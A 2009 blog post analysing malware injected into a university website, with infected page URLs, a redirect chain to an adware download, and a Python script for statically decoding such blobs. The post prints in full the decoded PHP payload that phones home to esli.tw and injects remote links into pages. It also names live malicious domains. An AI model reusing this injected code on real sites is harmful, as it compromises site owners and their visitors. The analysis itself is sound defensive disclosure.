Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

A couple of days back I reported the infection to a few security researchers through OWASP. Now Firefox and Google say the same! If we visit http://www.nagarjunauniversity.ac.in/, the Firefox browser alerts you with the following warning:

Another way to check whether it is serving malicious pages or malware: type "nagarjunauniversity" into the Google search box and open the first link.

Google's description of the pages hosted by www.nagarjunauniversity.ac.in is:

Real time view of malicious pages and Analysis
Visiting the site welcomes you with script execution; see the diagram below.
Viewing the source of this page will make you think for a while. Why are Chinese and Russian links present in the page? Have a glimpse of the code.


When I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry, the code is still present, but on other pages. While I am writing this blog, base64 encoded content is present on the following pages and many more:
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
The source code of either of these pages looks like this:
If you look carefully, you can see a URL that is partially encoded (percent-encoding):
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description also mentioned the bale.ws domain.
When we open the above site, it gets redirected to
http://superpupermegacasino.com/ which hosts *SmartDownload.exe*

VirusTotal reports the EXE as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

Well, decoding the base64 content with the base64_decode() call present within the malicious page gives the script below, which is passed as an argument to eval(). eval() then executes the script:

```php
error_reporting(0);

$links = new GetLinks();

echo $links->Links;
class GetLinks
{
    var $host = "esli.tw";
    var $path = "/link.php?site=";
    var $site = "";
    var $user_agent = "";

    var $Links = "";

    var $_socket_timeout = 12;
    var $_cashe_life_time = 3600;
    var $_cashe_file = "cashe.txt";

    function GetLinks()
    {
        if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

            $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
            $this->user_agent = $_SERVER['HTTP_USER_AGENT'];

            $this->Links = $this->fetch_remote_file();
            if ($handle = fopen($this->_cashe_file, 'w')) {
                fwrite($handle, $this->Links);
            }

            fclose($handle);
        }
        else {
            $this->Links = file_get_contents($this->_cashe_file);
        }
    }

    function fetch_remote_file()
    {
        $buff = '';
        $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
        if (!$fp) {

        } else {
            $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
            $out .= "Host: {$this->host}\r\n";
            $out .= "Connection: Close\r\n\r\n";

            fwrite($fp, $out);
            while (!feof($fp)) {
                $buff .= fgets($fp, 128);
            }
            fclose($fp);
            $page = explode("\r\n\r\n", $buff);
            return $page[1];
        }
    }
}
```
I am not sure what cashe.txt does or what its contents are!
The HTML tag responsible for the execution of scripts, malware, etc. is IFRAME.
The next blog post will most probably be an analysis of the SmartDownload.exe binary. Safe surfing!!!
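When pages like these turn up on a server you maintain, the base64 blob and the percent-encoded URL can be decoded statically, without ever letting eval() run them. The Python sketch below is an added example, not code from the infected pages or from this post; the function name `triage`, the regular expressions and the sample page are assumptions built around the two strings quoted above.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# eval(base64_decode("...")) with optional whitespace and either quote style
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# Percent-encoded absolute URL such as http%3A%2F%2Fhost%2Fpath
ENC_URL = re.compile(r"https?%3A%2F%2F[A-Za-z0-9%._~-]+", re.IGNORECASE)
# Host assignment inside a decoded PHP payload: $host = "name";
PHP_HOST = re.compile(r"\$host\s*=\s*['\"]([A-Za-z0-9.-]+)['\"]")

# Constructed sample page (not the real page source); it reuses two strings from the post
PAYLOAD = 'error_reporting(0); class GetLinks { var $host = "esli.tw"; }'
SAMPLE = (
    '<?php eval(base64_decode("' + base64.b64encode(PAYLOAD.encode()).decode() + '")); ?>\n'
    '<script>var u = "http%3A%2F%2Fbale.ws%2Fshow.php";</script>\n'
)


def triage(source: str) -> dict:
    """Statically decode suspicious blobs in page source; nothing is executed."""
    payloads, hosts = [], set()
    for match in EVAL_B64.finditer(source):
        blob = "".join(match.group(1).split())  # drop line wrapping inside the blob
        try:
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, so not the pattern we are after
        text = decoded.decode("utf-8", errors="replace")
        payloads.append(text)
        hosts.update(PHP_HOST.findall(text))
    urls = [unquote(u) for u in ENC_URL.findall(source)]
    for u in urls:
        host = urlsplit(u).hostname
        if host:
            hosts.add(host)
    return {"payloads": payloads, "urls": urls, "hosts": sorted(hosts)}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it over every file under the web root and compare the resulting hosts against the domains the site is supposed to reference.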